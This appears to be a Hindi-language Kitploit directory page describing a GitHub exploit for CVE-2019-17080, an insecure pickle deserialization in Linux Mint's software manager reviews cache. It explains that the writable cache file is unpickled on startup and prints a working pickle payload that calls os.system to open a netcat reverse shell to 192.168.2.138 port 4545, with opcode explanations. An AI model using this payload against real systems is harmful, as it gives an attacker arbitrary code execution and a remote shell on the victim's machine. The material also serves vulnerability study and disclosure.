Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Mintinstall-object-injection — CVE-2019-17080 | Kitploit
उपकरण/GitHubGitHub/materaj2/mintinstall-object-injection
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFलर्निंग और शिक्षाबाइनरी शोषण
GitHubmateraj2/mintinstall-object-injection

Mintinstall-object-injection

CVE-2019-17080

रिपॉजिटरी देखें
26 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Linux mint सॉफ्टवेयर प्रबंधक (v 7.9.5/9) गलत कॉन्फ़िगरेशन के कारण हमें ऑब्जेक्ट इंजेक्शन और मनमाना कोड निष्पादित करने का कारण बनता है।

root@kitploit:~
mintinsall

Mint सॉफ्टवेयर प्रबंधक चलाने पर यह जाँचता है कि कोई नई टिप्पणी है या नहीं। यदि कोई नई टिप्पणी है, तो new-reviews.list से डाउनलोड करके फ़ाइल में लिखता है।

root@kitploit:~
code mintinstall.py

सॉफ्टवेयर प्रबंधक प्रारंभ होने पर, यह reviews मॉड्यूल से ReviewCache() क्लास को कॉल करता है।

डेटा को कैसे संसाधित करता है?

root@kitploit:~
code reviews.py

ReviewCache क्लास प्रारंभ होने पर (init) यह _load_cache() फ़ंक्शन को कॉल करता है।

Load cache फ़ंक्शन REVIEWS_CACHE वेरिएबल में फ़ाइल को पढ़ता है और pickle मॉड्यूल की सहायता से फ़ाइल के अंदर डेटा को unserialize करता है और कुछ मानों को मेमोरी में रखता है।

टूल डाउनलोड करें

फ़ाइल की जाँच करने पर यह देखा गया कि मेरे पास लिखने की अनुमति है।

Pickle मॉड्यूल की सहायता से serialize/unserialize संचालन कर सकते हैं, इसलिए reduce विधि का उपयोग करके मॉड्यूल शामिल करके मनमाना कोड निष्पादित कर सकते हैं।

इस स्थिति में, यदि फ़ाइल को unserialize करने का प्रयास किया जाता है, तो हमारा दुर्भावनापूर्ण कोड चलेगा।

root@kitploit:~
cos 
system 
(S'nc -e /bin/sh 192.168.2.138 4545' 
tR.
>>मॉड्यूल नाम c{os}
>> फ़ंक्शन
( >> मार्कर ऑब्जेक्ट 
S >> उद्धरण चिह्न के अंत तक पढ़कर स्टैक पर डालें
tR. >> स्टैक पर मौजूद चीज़ों को कॉल करें और परिणाम को स्टैक पर रखें।

alt-text